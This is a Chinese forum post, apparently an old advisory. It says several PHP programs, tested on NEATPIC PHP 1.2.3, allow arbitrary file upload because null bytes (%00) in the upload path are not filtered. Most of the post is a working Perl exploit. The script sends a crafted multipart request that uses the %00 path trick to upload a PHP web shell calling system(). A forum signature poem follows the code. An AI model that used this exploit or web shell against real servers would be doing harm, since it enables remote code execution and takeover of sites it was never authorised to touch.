多种PHP程序存在\0过滤不严漏洞

多种PHP程序存在\0过滤不严漏洞
来源：不详
危害：直接上传任意文件
漏洞描述：
当PHP程序有指定PATH时，在PATH文件后门加入%00可以上传任意文件.
测试程序：NEATPIC PHP目录直读版 1.2.3
此文档参与者：
漏洞实验者：Xiaolu,Lilo,SuperHei,Darkness [All BST Members]
Http://Www.Bugkidz.org
Xiaolu提供了一个漏洞利用程序：

#!/usr/bin/perl
$| = 1;
use Socket;
$host = "127.0.0.1";
$port = "80";
$UploadTo = "";
$str =
"-----------------------------7d41f4a600472\r\n".
"Content-Disposition: form-data; name=\"path\"\r\n".
"\r\n".
"www.ppp%00\r\n".
"-----------------------------7d41f4a600472\r\n".
"Content-Disposition: form-data; name=\"image\"; filename=\"F:\\tools\\1.gif\"\r\n".
"Content-Type: text/plain\r\n".
"\r\n".
"<?php\r\n".
"system($c);\r\n".
"?>\r\n".
"-----------------------------7d41f4a600472--\r\n".
"\r\n";
print $str;
$len=length($str);
print $len;
$req ="POST /1/1/3721/index.php?action=upload HTTP/1.1\r\n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*\r\n".
"Referer: http://127.0.0.1/index.php?path=.\r\n".
"Accept-Language: zh-cn\r\n".
"Content-Type: multipart/form-data; boundary=---------------------------7d41f4a600472\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322)\r\n".
"Host: 127.0.0.1\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n".
"Cookie: PHPSESSID=111111111111111111111111\r\n".
"\r\n".
"$str\r\n\r\n";
print $req;
@res = sendraw($req);
print @res;
#Hmm...Maybe you can send it by other way
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems\n");
socket(S,PF_INET,SOCK_STREAM,getprotobyname(';tcp';)||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $req;
my @res = <S>;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can';t connect...\n");
}
}

复制代码

收藏分享评分

                  我是一个呼吸着现在的空气而生活在过去的人
            这样的注定孤独，孤独的身处闹市却犹如置身于荒漠
                                 我已习惯了孤独，爱上孤独
                              他让我看清了自我，还原了自我
                           让我再静静的沉思中得到快乐和满足
                                 再孤独的世界里我一遍又一遍
                                 不厌其烦的改写着自己的过去
                                          延伸到现在与未来
                                    然而那只是泡沫般的美梦
                              产生的时刻又伴随着破灭的到来
                     在灰飞烟灭的瞬间我看到的是过程的美丽
                                    而不是结果的悲哀。。。

回复引用

订阅 TOP

返回列表

多种PHP程序存在&#92;0过滤不严漏洞

多种PHP程序存在\0过滤不严漏洞